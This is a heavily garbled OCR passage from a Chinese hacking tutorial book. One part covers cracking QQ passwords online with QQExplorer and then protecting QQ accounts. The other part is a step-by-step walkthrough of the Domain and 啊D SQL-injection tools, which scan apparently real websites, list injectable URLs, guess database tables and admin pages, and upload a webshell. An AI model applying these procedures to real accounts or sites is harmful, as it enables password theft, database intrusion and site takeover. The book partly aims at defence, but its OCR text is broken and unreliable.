域 中 启 有 人 举足轻重 的 地 位 , 因此 , QQ 的 安全 一 下 十 倍 受 天 注 的 问题 ， 
用 户 的 QQ 瓯 拱手 让 人 了 ， 即 使 用 户 注 意 了 QQ 的 安全 ， 但 对 于 QQ 在 线 破解 


上 其 ,其 破解 功能 较 强 , 设置 简便 。 


双击 “QQExplorer” 应 用 程序 图 标 ， 即 可 打开 “QQExplorer” 主 界面 ， 使 用 它 在 线 破解 QQ 


的 过 程 坚 光 如 下 。 
STEPO1: 运行 QQExplorer 





地 加 或 旺 除 HTTP 代 理 服务 性 
BR 务 器 : EE 166. 1. 102 端口 : Bos0 | ; 








- 自 定义 探测 一 || 通过 验证 


| 痪 口 | | user | psw | 








| A J 
QoS 码 | | 




















99Explorer 当 前 状态 : 厂 开机 自动 运行 ”当前 执 社 |ShifttFtrltFl 


填写 QO 号 码 ( 必须 在 线 ) 和 
代理 服务 器 的 |P 地 址 及 疹 口 号 码 。 


©@ 如 果 觉 


Ws 


提示 


2. QQExplorer 在线 破 解 及 防范 





单 击 “ 添 加 检测 此 服务 


& 测 试 ”按钮 。 


STEP02: 开始 破解 响 码 


所 QQExplorer verl.26 


E 不 使 用 ITTT 代 理 服务 器 助 你 按 回 丢失 的 密码 : a -| 





添加 或 喇 除 HTTF 代 理 服务 器 
服务 器 : [EEC 























了 ， 站 | 
产 载 入 全 理 服 务 多 
Explorer 1. 运行 


IQQEx 6 开 


单 击 “ 开 始 ”按钮 ， 开 始 


是 否 正常 。 在 线 密码 破解 。 


得 寻找 QQ 代理 服务 器 列表 麻烦 ， 可 使 用 一 些 现成 的 QQ 代理 公布 





QQExplorer 在 线 人 破解 改变 了 本 地 破解 被 动 的 破解 方式 ， 只 要 是 在 线 的 QQ 号 但 都 可 以 





人 破解， 
数 长 度 及 类 


适用 范围 较 广 ， 因 此 一 定 要 当心 。 由 
型 时 ， 校 验 时 间 很 长 ， 人 破解 效率 却 人 不 高 。 


于 它 仍然 采用 穷 蕉 法 拉 术 ， 因 此 在 枚 从 密 钥 位 
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二 [KK > 
用 攻防 从 入 门 到 精通 
小 全 人 人 他 








这 种 方法 还 受到 计算 机 速度 、 网 速 等 诸多 因素 的 影响 ， 比 本 地 破解 更 慢 、 更 矿 烦 。 
此 ， 对 于 这 种 破解 方式 ， 设 置 足够 复杂 密 但 是 一 个 非常 有 效 的 预防 手段 。 
15.2 ”保护 QQ 密码 和 聊天 记录 


一 旦 QQ 吕 码 被 盗 ， 吏 可 能 导致 一 些 重要 的 信息 泄露 ， 从 而 造成 一 定 程度 的 损失 。 那 
么 ， 用 户 惑 应 该 采取 一 些 有 效 撞 施 防止 目 己 的 QQ 密码 泄露 。 

















15.2.1 定期 修改 QQ 客 码 


QQ 密码 使 用 时 间 过 长 ， 就 会 很 容易 被 他 人 破译 ， 所 以 为 了 避免 这 一 点 ， 定 期 修改 QQ 
密码 很 有 必要 。 
修改 QQ 密码 需要 进行 以 下 操作 。 





STEP01: 打开 QQ 主 界 面 STEP02: 修改 密码 




















* 验证 码 : bvky 


表 输 入 图 中 字符 ， 不 区 分 大 小 写 








在 QQO 主 界面 左下 角 单 击 “ 主 菜单 ”按钮 ， 在 弹出 的 ”根据 提示 填写 相关 信息 ， 然 后 单 击 “ 确 定 ” 按 钮 。 
菜单 中 单 击 “ 修 改 密码 ”命令 。 


STEP03: QQ 笑 码 修改 成 功 STEP04: QQ 下 线 通知 


OU THE 


很 把 车 ， 白 于 您 的 密友 被 修改 或 帐号 进入 保护 
模式 等 原因 ， 出 于 安全 考虑 ， 请 关闭 并 重新 启 


动 QQArM。 
建议 您 收 改 密码 。 





QO 密码 修改 成 功 提示 信息 。 单 击 “重新 登录 ”按钮 。 


310 


< 第 15 章 


STEP05: 重新 输入 QQ 密码 


_ 重新 登录 
您 术 人 的 客 冶 不 正确 ， 原 因 可 能 旺 : 
记 销 密 的 ; 未 区 分 字母 六 小 号 ; 未 开启 小 键盘 ， 








15.2.2 申请 QQ 客 保 
QQ 密 你 是 为 了 加 强 QQ 安全 性 而 推出 的 一 于 密 


输入 新 密码 ， 


QQ 账号 攻防 


单 击 “ 登 录 ” 按钮 即 可 重新 登录 QQ。 


担保 护 功能 。 无 论 用 户 的 QQ 被 盗 还 是 


还 记 密码 ， 都 可 以 通过 QQ 密 保 来 找 回 目 己 的 QQ 或 者 重 管 密码 。 


申请 QQ 冤 保 需要 进行 以 下 操作 。 


STEP01: 打开 QQ 主 界 面 STEPO2: 


设置 密 保 


各 不 | 是 丽 
QQ 密码 , 快速 找 回 


切 衷 碗 及 
由 用 户 选 定 的 3 个 问题 及 对 应 答案 组 成 ， 专 门 用 于 找 回 密码 和 设置 其 他 密 保 。 主 要 包 合 用 户 世 
括 : 班主 任 姓名 、 配 偶 生 日 、 大 学 室友 等 。〈 注 : 腾讯 公司 不 会 泄露 用 户 的 隐私 。》 


代 l 县 许 不 
密 保 问题 有 何 局 限 ? 


密 保 问 题 采 用 静态 密码 ， 易 引起 安全 风险 ， 如 果 您 不 在 常用 地 登录 ， 可 能 无 法 通 i 


修改 密 保 工具 。 
扩建 议 您 绑 定 其 他 密 保 。 





在 QO 主 界面 左下 角 单 击 “ 主 菜单 ”按钮 ， 依 次 选择 
“安全 中 心 ”> “申请 密码 保护 ”菜单 命令 。 选项 。 
STEP03: 密 保 问题 填写 STEP04: 


为 了 避免 遗忘， 请 您 填写 真实 信息 ， 这 将 帮助 您 L 人 后 通过 回答 问题 快速 找 回 QQ 密码 。 


问题 一 : | 您 高 中 班主 任 的 名 字 是 ? -| 
全 全 汪汪 保 间 题 

母亲 的 姓名 是 ? 
ee 是 ? 

您 的 学 与 是 ? 


= 你 你 母 
3 : 本 sn 





管 雪 : 














选择 密 保 问 题 并 填 好 答案 后 , 单 击 “ 下 一 步 ”按钮 。 


单 击 “ 密 保 问题 ” 


问题 一 : 


答案 : 





根据 上 一 步 填写 的 问题 输入 对 应 的 答案 后 


单 击 “立即 设置 ” 
按钮 。 


确认 密 保 信息 


以 下 是 您 刚刚 设置 的 密 保 问题 ， 请 依次 做 出 回答 ， 以 恒 进 行 确认 。 


您 小 学 班主 任 的 名 字 是 ? 





OX 





二 : 您 初中 班主 任 的 名 字 ? 
管 案 : 
问题 三 : 








wx | 
您 高 中 班主 任 的 名 字 是 9 
答案 : | 





单 击 


“下 一 步 ” 按 和 钮 。 


311 





取 RN 








Po > 
新 2 攻防 从 入 门 到 精通 


合 人 他 他 


STEP05: 绑 定 密 保 手机 STEP06: 设置 成 功 


(|】 蒜 喜 您 ， 成功 设置 密 保 问 题 和 密 保 手 
机 ! 


体验 免费 验证 码 ， 立 即 下 载 QQ 安 全 中 心 手机 版 更 多 下 载 方式 >> 


Nd 


869%o 的 用 户 为 防止 QQ 被 次 ， 选 择 继续 绑 定 密 保 于 机 ! 





请 输入 您 的 手机 号 : | 15816802015 | 








请 再 输入 一 遍 : | 15816802015 


讯 公司 不 会 缚 定 任何 服务 ， 不 会 会 地 项 您 的 手机 号 * 隐私 条 吉 
部 分 省 塘 电 售 CDMA 手 机 和 小 灵 ] :机 不 支持 绪 定 密 保 于 机 。 











微 信 一 发 现 * 扫 一 扫 下 载 





输入 绑 定 QO 号 码 的 手机 号 后 , 单 击 " 下 一 步 " 按钮 。 显示 成 功 设置 密 保 问题 和 密 保 手机 的 提示 信息 。 


15.2.3 加密 聊天 记录 


在 日 常 聊天 时 ， 有 了 时候 难免 涉及 一 些 个 人 隐私 信息 , 但 是 如 果 QQ 聊天 记录 没有 加 答 ， 
这 些 隐 私信 息 就 很 有 可 能 泄露 。 因 此 需要 局 用 聊天 记录 加 和 密 功 能 ， 防 患 于 未 然 。 
司 用 加 密 功 能 需要 进行 以 下 操作 。 
STEP01: 打开 QQ 主 界 面 STEP02: 打 “系统 设置 ”对 话 框 
》 宅 多 [8/19 : \ 
hb 网友 [5/1]] 
同事 [5/8] 
工作 伙伴 [EBP 
企业 好 友 [0 器 
阳 生 人 [o/795] 
名 关 一 导 各。 





消息 记录 :。。 口 ] 去 出 QQ 时 自动 删除 所 有 消息 记录 
如 果 您 需要 删除 某 个 人 或 者 梨 个 群 的 消息 记录 ,请 使 用 灌 息 管理 器 
打开 湛 导 管理 恒 | 
你 可 以 对 全 部 湛 息 记录 技 照 对 间 段 出 除 
删除 浓 息 记录 
口 启用 消息 记录 加 密 


于 议 安 oq 沉 吉 . 增强 访问 网 阁 的 安全 性 。 


安全 模块 及 时 更 新 ， 可 保科 您 的 QQ 使 用 安全 。 
外 有 安全 更 新 时 生动 为 我 安装 ， 无需 可 奋 ( 推 稳 ) 
〇 有 安全 更 新 时 提 枉 我, 不 自动 安装 





单 击 “ 系 统 设 置 ” 图 标 。 依次 选择 “安全 设置 ”>“ 消 息 记录 ”。 
STEP03: 尼 用 消息 记录 加 密 STEP04: 输入 消息 密码 


洪 扔 记录 已 加 密 。 请 本 入 消息 密码 : 


> 启用 加 将 口令 提示 
提示 问题 ，| 您 最 襄 欢 听 的 育 乐 是 什么 ? 
问题 符 案 





公 选 “启用 消息 记录 加 密 ” 复 选 框 ， 输 入 口令 以 及 “再 次 登录 QQ 时 ， 输 入 QQ 密码 后 需要 再 次 输入 消息 
加 密 口 令 提示 人 信息。 关闭“ 系统 设置 ”对 话 框 。 密码 才能 登录 QQ。 
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当 一 个 网 站 完全 建立 后 ， 如 果 服 务 器 与 用 户 有 大 量 的 交互 程序 ， 而 程序 员 
又 没有 足够 的 安全 意识 ， NAN 就 会 很 多 ， 这 将 给 网 站 带 来 不 少 安 全 
隐患 。 而 像 SQL 注入 、Cookie 注入 、 啊 了 D 注入 、Domain 注入 等 各 种 各 样 的 代 
码 汤 洞 ， 会 让 网 站 程序 面临 巨大 的 安全 隐患 。 


O SQL 注入 攻击 曝光 

O ZBSI 检测 注入 点 曝光 

O 〇 O Cookie 注入 攻击 曝光 
跨 站 脚本 攻击 曝光 





二 = | 

取 re > 
用 攻防 从 入 门 到 精通 
小 全 人 人 他 





16.1 SQL 注入 攻击 曝光 


由 于 程序 员 的 水 平 及 经 验 参差 不 齐 ， 他 们 中 相当 大 一 部 分 在 编写 网 站 代码 时 ， 没 有 对 
用 户 输入 数据 的 合法 性 进行 判断 ， 从 而 使 网 站 存在 不 少 安全 隐患 。 用 户 可 提交 一 段 数据 库 
查询 代码 ， 根 据 程序 返回 的 结果 ， 获 得 某 些 想 知道 的 数据 (所 谓 的 SQL injection， 即 SQL 
注入 )。 

SQL 注入 攻击 一 般 可 分 为 查找 可 攻击 的 网 站 、 判 断后 台数 据 库 类 型 、 确 定 XP CMDSHELL 
可 执行 情况 、 发 现 Web 虚拟 目录 、 上 传 ASP 木马 以 及 得 到 管理 员 权 限 等 几 个 步 又 。 

目前 ， 国 内 的 网 站 用 ASP+Access 或 SQL Server 的 占 70% 以 上 ， 用 PHP+MySQL 的 占 
20%， 其 他 的 不 足 10%。SQL 注入 攻击 按 网 站 类 型 主要 分 为 ASP 注入 攻击 和 PHP 注入 攻 
击 两 种 ， 另 外 ， 还 有 JSP 注入 攻击 和 CGI 注入 攻击 等 。 














16:1.1 Domain ( 明 小 子 ) 注入 曝光 


劳 注 Web 和 合 检测 程序 (Domain)〉 是 一 于 功能 强大 的 SQL 注入 工具 ， 集 WHOIS 奉 
询 、 上 传 页 面 批量 检测 、shell 上 传 、 数 据 库 浏 览 及 加 密 解 密 等 于 一 体 ， 可 以 帮助 用 户 很 方 
便 地 进行 旁 注 检测 、 综 合 上 传 、SQL 注入 检测 、 数 据 库 管理 。 而 虚拟 主机 域名 查询 、 二 级 
域名 查询 、 整 合 读 取 、 修 改 Cookies 等 功能 更 方便 入 门 的 读者 。 

1. 使 用 Domain 实现 注入 

Domain 主要 包括 劳 注 检 测 、 绽 合 上 传 、SQL 注入 检测 、 数 据 库 管理 、 破 解 工具 以 及 辅 
助 工 具 6 个 模块 ， 其 每 个 模块 都 由 许多 小 功能 组 成 ， 每 个 检测 功能 都 采用 多 线程 技术 。 

使 用 Domain 实现 注入 的 过 程 曝光 如 下 。 


STEP01: 运行 Domain 注入 工具 STEP02: 网 页 浏览 























加 HB 综 合 检 负 三 厅 Ver 《05. 7。 动 
同 PE 注 入 “名 ] 数 据 库 管理 “加 破解 工 “加 辅助 工具 多 关 于 程序 压 综 合 上 传 “区 ,SQL 注入 飞 辕 PIHE 注 入 国 和 本 A 2 她 关 于 程序 
输入 域名 : wtopD1. com 203. 171. 239. 143 查询 || 刷新 || 前 进 || 后 退 


当前 路 径 : http://www. newtop01. com/ 连接 

oa t_bc_120811=13600011811368426065 ; s_120811=0_12404173867_T60595424; ASPSESSIONIDSSK 修改 

当前 页 面 :1 页 ”本 页 显示 : 1 - 6 站 排名 : 询 完 毕 ! 共有 站 点 : 当前 页 面 :1 页 ”本 页 显示 : 1 - 6 。 网 站 排名 :Wo Data ”提示 :注入 点 检测 完毕 ! 
览 ||[ 三 级 检测 | [ 网 站 批量 检测 | | 功能 设置 | | 功能 介绍 | 












































人 


文章 中 心 | 电子 课件 | 资料 下 载 | 关于 我 们 | 联系 3 
图 书 查询 | 考试 中 心 | 文 尝 畅 谈 | 与 作 经 | 放 妈 | 


| 新 起 点 工作 罕 


新 起 工作 室 


书 专职 和 专业 图 书 工作 室 ， 
现 已 出 点 余生 娄 中 尖 计算 机 加 书 请 (新 书 4 网 此 


在 国内 i 算 机 图 书 出 版 界 产生 了 深 运 > " «et 
教育 、 财 经 、 管 理 等 rR 会 (新 书 (0W 时 有 
Ss 会 《 t 则 务 行 JEE 
了 人 《网 络 化 力 公 
9 会 《pkeeal2007BR 
冰 品 是 加 由 内 和 ms -本 
pS ed NG Es 会 《 《加 密 和 解密 
Ira ET CC SN 7 Sy 
,SE 可 兰 : Ws 操作 系统 、 数 据 库 . 粹 访 束 程 窒 《 《黑客 攻 了 局 











输入 域名 并 单 击 ” 国 单 而“ 查 国 查看 列 出 国 选 择 列表 中 的 任意 一 蚁 在 “注入 点 ”列表 
2 按钮 检测 该 网 站 “ 询 ” 按钮 。 ”的 6 个 相关 站， 个 网 址 ， 单 击 “ 网 页 浏 ” 中 查看 所 有 刚 发 现 的 注 


域名 所 对 应 的 IP 地 址 。 所。o 览 ” 按 钮 , 可 打开 “网 页 “入 点 。 
浏览 ”页 面 。 


314 


-ee 和 16 章 





STEPO3: 级 检测 


网 站 攻防 


STEP04: 网 站 批量 检测 








| 加 这 注 检测 “| 国 综 合 上 伟 良 sq 注入 人 周 Pr 注 入 re 国 破解 工具 六 辅 助 工具 Ws 


输入 域名 : www. newtop01. com 203. 171. 239. 143 [查询 | | 刷新 || 前 进 || 后 退 | 
当前 路 径 : http:7ywww. newtop01. com/ 





Cookies: ystat_bc_120811=13600011811368426065;，ystat_ss_120811=0_1240417387_760595424; ASPSESSIONIDSSK 
当前 页 面 :1 页 ”本 页 显示 : 1 - 6 


网 站 排名 :Ho Data 查询 二 级 域名 中 ... 


En a 共有 AAA: 
www. OTB9rY. com Sa TT 
www. banroom. com 





EE 十 


| www. zyt2008.。 com 














国 单 击 “二 级 pg 单 击 “ 网 站 
令 测 ”按钮 。 址 , 查询 二 级 域名 批量 检测 " 按钮 。 
以 检测 整 站 目录 。 


STEP05: 并 加 网 址 


wu baidu.corm 


辆 输入 想 要 添加 的 网 址 。 单 击 “OK” 按钮 。 


STEP07: 选择 保存 位 置 





|x 





Documents and 
Setlings 


我 的 电脑 
3 
网 上 和 邻 拓 


Files of pe: of type，| TXT 文件 ft | 图 


输入 想 要 
保存 的 名 称 。 


单 击 “Save” 按 钮 ， 可 将 
分 析 结 果 保存 至 目标 位 置 。 











加 Yer3-5 (05-7- 1 版 ) [ - 明 小 子 ] 
| 总 这 注 检测 “| 加 综合 上 伟 区 sn 注入 、 辐 PI 注 入 “外 ] 数 据 库 管理 “加 破解 工 “` 癌 辅 晤 工 具 “多 关 于 程序 


输入 域名 : www. newtop01. com 203. 171. 239. 143 查询 || 刷新 || 前 进 上- 一 A | 
当前 路 径 : http: www. newtop01. com/ 
Cookies: ystat_bc_120811=13800011811368426085; ystat_ss_120811=0_1240417387_760595424; | 一 修改 | 
站 共有 站 点 :6 。 ”当前 页 面 :1 页 。 本 页 显示 : 1 - 6 。 网 站 排名 :No Data 查询 二 级 域名 中 
wwW,DT69zzr， com 
WHW. banroom. com 


WHW. CCpPAa. COM 
www., chinaitchong. com 








| 功能 设 重 | | 功能 介绍 | 


竺 机 同上 i 


http://www. OT69zr. com 

http: /fwww. banroom. com 
http://www. ceppaa. Com 
http:/ /www. chinaitchong. com 
http://www. newtop01. com 
http://www. zyt2008. com 


WwWw, zyt2008. com 








bbs/ i 
fdown_ picupldad. asp 





加 查看 待 检测 网 址 。 单 击 “ 添 加 指定 


网 址 ”按钮 。 


“网 站 批量 检测 ”页 面 


《05. 7- 1 取 )》 [ 


STEP06: 返回 


回 [PE 


存在 风向: [ 右 击 打开 ] 


http: /iwew baidu con/bbs/upfile. asp 





http://waw. baidu, com/upfile_soft. asp 
http: //waw. baidu. com/upload. asp?action=upfile 

















e. asp 

fbbs/ down._ 了 Et 在 

/bbs/ dorn_pi cupfile. 
wr picupload, a 











国 单 击 “开始 辆 分 析出 该 网 站 国 单 击 “保存 
按钮 。 ”中 所 包含 的 页 面 。 结果 ”按钮 。 


STEP08: 功能 设置 


丛 测 - 





| 国 综 合 上 传 【区 sql 注入 \ 辕 mr 注入 一 一 国 破 解 具 | 癌 辅 助 了 具 |【 竞 关 于 程序 、、 


0 203. 171. 239. 143 CC][ 半 了] 所 
当前 咯 径 : http://www. newtop01. com/ 


Cookies: Ystat_bc_120811=13600011811368426065; ystat_ss_120811=0_1240417387_760595424; ASPSESSIONIDSSK 
FE FA 共有 站 点 :6 。” 当 前 页 面 :1 页 ”本 页 显示 : 1 - 8 。 网 站 排名 :Ho Data 








| Www, ccppaa, com 


浏览 网 页 时 检测 是 否 存 在 注入 点 并 提示 
ii 


3 器 查询 虚拟 主机 后 , 上 动 吉 入 到 网 站 扫 量 位 测 





国 对 浏览 网 页 时 的 个 
别 选项 进行 设置 


国 单 击 “ 功 能 
设置 ”按钮 。 
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MW 





信人 全 
STEPO9: en 注入 








HSQL 辅助 工具 管理 入 口 扫描 检测 设置 区 该 板块 功能 介绍 


批量 扫描 注入 点 


59L 注 入 壮 解 检测 





http://waw. OTB9rr. com 
http://waw. banzoom. com 
DAD Hwaw. ccppasa. com 
htt. Hi ate co 











http: Pe zyt2008. com 


连接 地 址 : 共 20 条 

http://www. newtopDl. com/web/kind. asp?id=4 

http://www. newtop0l. com/web/kind. asp?id=1 

http: //www. 990， comfwebykind. asp?id=9 

http://wuw. newtopDl. com/. . /sit bo asp?Hooki d=100 
http: fw. mentop01 com7- -fsite/book/list. asp?l ooki d= -99 、 


符 爆 库 连 接 http://www. xxx. com/xxxf1list. asp?id=1? 
数据 库 路 径 
已 检 i 调 按 : 20 条 


http://wew. mnevtopD1. com/web/site/book/list. asp?hookid=73 
http://wew. newtopOl. com/web/site/book/list. asp?hookid=72 
http: / /wew. nevtopOl. com/web/site/book/list. asp?hookid=76 


http: //wew. newtopOl. com/web/kind. asp?id=4 


注入 点 : 共 检 讽 图 |18 个 可 注 六 地 址 ! 
http:/ /www. newtopD01. com/web/site/book/]ist. asp?booki d=91 
http: /fwww. newtop01. com/web/ site/book/1ist. asp?booki d=80 
http://www. newtopO1. com/web/ site/book/list. asp?booki d=98 
http:/ /www. newtopD1. com/w sb/ ste/ bookyat at. ee 二 
http:/ /www. newtop01. comywebysi ook/lis ?bovoki d=: 
http:/ /www. newtopD1. com/w steal it i 81 
http:/ /www. newtopD1. com/wab/kind. asp?id= 

|ihttp:/ /www. newtop01. 半生 eb/site/book/li Ts asp?booki d=97 











STEP10: 


> 


Pe 
各 攻防 从 入 门 到 精通 





国 单 击 “批量 扫描 注入 点 ” 按钮， 打开 “扫描 注入 
点 " 选项 卡 。 


国 单 击 “ 载 入 查询 网 址 " 按钮 ， 在 左 侧 窗 格 中 查看 
关联 的 网 站 地 址 。 


， 单 击 
列表 中 


再 选中 与 前 面 设置 相同 的 网 站 地 址 之 后 
注入 六 可 在 Ly 
看 检测 到 并 可 注入 的 所 有 注入 点 。 


STEP11: 开始 检测 以 及 查看 检测 结果 








检测 设置 区 该 板块 功能 介绍 














检测 T0P: 厂 ”| 加 自动 检测 下 一 条 记录 


贺 单 击 “SQL 注入 国 输 入 上 面 检测 到 的 任意 一 
猜 解 检 测 ” 按 钮 。 ”条 注入 点 。 


2. 使 用 Domain 扫描 管理 后 台 





使 用 Domain 扫描 管理 后 台 的 方法 很 简单 ， 


2 





防 5q[ 注 入 “网 PIF 注 入 “时 数据 库 管理 “加 破解 工具 “六 辅 肋 工 具 “次 关于 程序 


批量 扫 描 注 入 点 "| MSsQI 辅 助 工具 检测 设置 区 该 板块 功能 介绍 


排序 | userid 











检测 TOF: 上 ” ” ] 加 自动 检测 下 一 条 记录 





A ss 


ceess 泪 V 


范 i 


ET EC 
国 单 击 " 开 国 单 击 " 猜 解 表 圈 查看 SQL 注 
始 检测 ” 按 ”名 ”"“ 猜 解 列 名 "和 ”入 猜 解 检测 的 所 
钮 。 “ 猜 解 内 容 ” 按 钮 。 有 信息 。 


具体 过 程 曝 光 如 下 。 
STEP02: 管理 入 口 扫 描 








a ER ee 主 窗 口 











en 鲍 综 合 上 传 | Fp rr \ 国 破解 工具 “| 同 辅 助 工具 多 关 于 程序 


Nissal 畏 助 具 | se | 检测 设置 区 。 ”该 板 块 功能 介绍 








四 EST 本 





存在 连接 : [市 击 打开 ] EE 


| 已 经 找到 网 站 。 正 在 等 待 回 应 . .， | 


在 主 窗口 中 选择 
“SQL 注入 ”选项 卡 。 











单 击 “管理 入 口 
扫描 ”按钮 。 
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批量 扫描 注入 点 。 SQL 注入 猜 解 检测 。 ”MssQI 辅 助 工具 检测 设置 区 该 板块 功能 介绍 


区 各 obD1. com/web/kind. asp?id=4 


他 从 当前 目录 开始 扫描 | 〇 从 主机 地 址 开始 扫描 。 设置 线程 : 
已 检 训 连接 |93 条 


newtop01. yt asp 
newtop0l1. com/web/bbs/admin/login 











输入 前 面 扫描 到 的 注入 地 
址 ， 并 根据 需要 选择 “从 当前 
目录 开始 扫描 ” 单 选 按钮 。 


单 击 “ 扫 
描 后 人 台地 址 ” 
按钮 。 
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网 站 攻防 


STEP03: 设置 表 名 、 字 段 以 及 后 台地 址 





综合 上 传 “ | 以 SQ 注入 “| 同 PIF 注 入 “ 风 ] 数 据 库 管 理 “ 国 破 解 工具 人 辅助 工具 、 包 关于 程序 








批量 扫描 注入 点 。 “SQL 注入 猜 解 检测 。 ”MsSQI 畏 助 工具 


查看 “设置 表 名 ”" “设置 字 段 ” 和 “后 台地 址 " 
三 个 列表 的 详细 内 容 。 


< 
| 轨 | 
§ 


可 只身 只 
辽 古人 
Hx 


上 

| © © . 

EE 
py mn 


[大 -所 -是 必 种 防卫 入 六 六 六 有 隧 
和 





ASAT 
三 和 所 要 
加 =. 基 
” i 
» 


< 
TFET 
08. 可 
和 
人 二 








加 i i |z| 
me pete] pts) ihe Rtn] PB ot pt Rt 通过 单 击 “添加 ”按钮 和 “删除 ”按钮 ， 可 以 


i 设置 : 每 个 站 内 i 局 条 连接 进行 注入 点 检测 ! (该 取 的 数量 太 大 格 影 响 检测 如 度 ! 
Be ed .asp? 及 id 让 ee 己 设 置 ! a | 对 三 人 不 列 表 的 内 容 合 进 和 J 相 应 择 并 0 


提示 ;执行 添加 或 删除 及 修改 读 取 连接 数量 后 程序 将 会 自动 保存 到 SetData. mdb 数 闫 库 文件 里 面 ! 下 次 居 动 将 自动 读 出 ! 
程序 将 会 按照 你 所 选择 的 表 名 或 字段 进行 猜 解 ! 








提示 :后 台地 址 已 扫描 完毕 ! 0% 


3. 使 用 Domain 上 传 Webshell 
使 用 Domain 上 传 WebShell 的 方法 很 简单 ， 具 体 的 操作 步骤 如 下 。 


吓人 Ter3. 6 正式 了 《05-7- 1 不)【 昌 客 动 古 虽 耿 避 “南口 x| 
外 辩 注 检测 | 国 综合 上 传 SC FiP 注 办] 数据 库 管理 【破解 工具 | 辣 辅助 工具 “区 关于 程序 团 选择 上 综 合 上 传 " 选项 三 O 〇 


选择 类 型 
[一 册 上 全 志 且 动人 有 有 动 6 风 入 再 城 共和 上 信 居 有 C] 目 己 定 又 02 根据 需 拌 F 传 的 美 型 (这 里 选择 “二 网 上 
动 网 上 传 泼 洞 介绍 ， 无需 抓 包 , 使 用 默认 Cooki es 既 可 直接 上 传 ! 若 失败 , 请 自行 抓 包 填写 Cookies! | 漏 洞 ” ) 六 


漏洞 页 面 : http://www. xxx. com/bbs/upfile. asp 
提交 地 址 : http://fbaidu. com/ dvbbs/upfile. asp 


I 在 “提交 地 址 ”文本 框 中 填写 检测 出 的 任意 一 
和 个 漏洞 页 面 地 址 ， 选 择 “默认 网 页 木马 ” 单 选 按 
WebShell 地 址 : http:yybaidna com/ dvbbs/DIY. asp 钮 ， 在 i Ww 件 名 罗 和 “Cookies’” 文本 框 中 输入 相应 


内 容 ， 单 击 “ 上 传 ”按钮 。 





在 “返回 信息 ”选项 组 中 查看 WebShell 地 址 ， 
单 击 “打开 ”按钮 ， 即 可 根据 上 传 的 Webshell 地 
址 打开 对 应 的 页 面 。 





16.1.2 啊 有 注入 明光 


呵 D 注入 是 一 球 超 级 经 典 的 注入 工具 ， 它 优化 了 注入 线程 和 代码 ， 用 户 账号 可 以 随便 
填写 ， 无 任何 限制 ， 并 具有 目 创 的 注入 引擎 ， 能 检测 更 多 存在 注入 的 连接 ， 使 用 多 线程 技 
术 ， 检 测速 度 飞 快 。 对 “MSSQL 显 错 模式 ”“MSSQL 不 显 错 模式 ”和 Access 等 数据 库 都 
有 注入 检测 能 力 ， 内 集 “ 跨 库 得 询 ”“ 注 入 点 扫描 ”管理 入 口 检 测 ”“ 目录 碍 看 ”“CMD 命 
令 ?”“ 木 马上 传 ”“ 注 册 表 读 取 ”“ 劳 注 / 上 传 >“WebShell 管理 ”“Cookies 修改 ”于 pe 
合 注 入 工具 包 。 

实现 啊 D 注入 攻击 的 过 程 曝 光 如 下 。 
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全 人 人 他 
STEP01: 下 载 并 解压 啊 D 注入 工具 





| ， 计 兽 M ，z#tb 本 熏 (E) ， 韦 午时 宪 就 这 几 招 (修改 版 ， 163disk com_ 啊 D 注 入 工具 





文件 (F) ”编辑 (E) ”查看 (V) 工具 (T) ”帮助 (H) 
组 织 ” 包含 到 库 中 v 新 建文 件 夫 





次 收藏 夫 

由 下 载 

到 | 桌面 
蝇 最 乒 访 问 的 位 置 








d99.mdb Readme- 说 明 . 

说 库 htm 

关 PPTV 视 频 

国 视频 

图 图 片 

国 文档 

癌 迅雷 下 载 

盐 言 乐 
网 京 庭 组 


双击 “ 啊 D 注 入 工具 ”应 用 程序 图 标 。 








STEP03: 打开 网 站 


加] 啊 D 注 入 工具 v2.32 增强 版 暗 组 技术 论坛 Httpy//www.darkstcom 








sgl 注入 检测 
WC A) 


it 
CompHonorBig aspj 
hi baidhu comvidwtagdwqalr2rieixd3e61042b5035605658650467 
2009 年 2 月 6 日 - 漏洞 文件 : CompHonorBig.asp. 到 百度 或 者 是 GOOGLE 上 面 
CompHonorBig.asp?id= 就 会 得 到 很 多 个 注入 点 . 存在 注入 点 .如 果 你 是 新 手 ， 


inurl| CompHonorBig asp id 嫁 我 网 娩 介 网 淘宝 搜索 


s8.taobao.com/search?ex...id... ~ 
网 店 /网 络 服务 /软件 - 书籍 /杂志 /报纸 - 汽车 用 品 / 配 件 /摩托 车 - 女装 - 男装 - 淘 
玩具 /娃娃 /模型 /动漫 / 桌 游 - 电子 /电工 * 服务 市 场 - 3C 数 码 柄 件 市 场 - 新 人 装 拱 


Wwwhnrhcn/CompHonorBig.asp?ID=163 ~ 








[http: /7 /rww. sdngy. edu cxbsz/ jcb/ComplHonorBig. asp?id=33 
http:yywww. hlsip. com/CompHonorBiz. asp?id=33 











查看 网 站 以 及 扫描 到 的 注入 点 。 


STEP05: 检测 表 段 以 及 字段 


加] 啊 D 注 入 工具 v2.32 增强 版 暗 组 技术 论坛 Http://www.darkst.com 





注入 检测 注入 连接 |http :ffwww. hlsjp. com/CompllonorBie. asp?id=33 








检测 字段 检测 内 容 (171) 
[四 usernane | [ 信 数 ”| 内 3 二 
[vi password 
v i 











sqL 注 入 检测 
AN 


管理 入 口 检测 





























| 过 尖 : EE 口 措 误 时 停止 


NSSQL 数据 库 鲍 Scanat 














待 检测 完成 后 , 单 ” 国 选中 任意 一 个 表 段 ， 
“检测 表 段 ”按钮 。 单 击 “ 检 测字 段 ” 按 钮 ， 
ui 
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可 检测 出 该 表 对 应 的 字段 。 





攻防 从 入 i ] 到 精通 


STEPO2: 


加 ] 啊 D 注 入 工具 v2.32 增强 版 瞳 组 技术 论坛 Http://www,darkstcom 


输入 注入 网 址 











SQL 注入 检测 
AN 


管理 入 口 检 测 











| 
MsSsS9L 专 用 表 段 检测 由 
a 


| 7? [ 检 刘 下 一 个 | | 1? 开始 售 0 
) MSSQL 数据 库 显 错 醒 式 SgL 数据 库 人心 kccess 或 其 他 数据 库 


多 行 执行 | _ |_|] 当前 权限 [一 当前 用 户 -一 一 

















单 击 “ 扫 描 输入 注入 的 网 站 地 址 
注入 点 ”按钮 。 并 单 击 “检测 ”按钮 。 
STEP04: 修改 Cookies 


加 啊 D 注 入 工具 v2.32 增强 版 暗 组 技术 论坛 Http://www.darkst.com 





SQL 注入 检测 
和 


管理 入 口 检测 








http://s8. taobao. com sear|h7?ex_q= 881terginenessrahatypechcort Eale-deschstyle=gri dhfrom_bt=1& 辐 
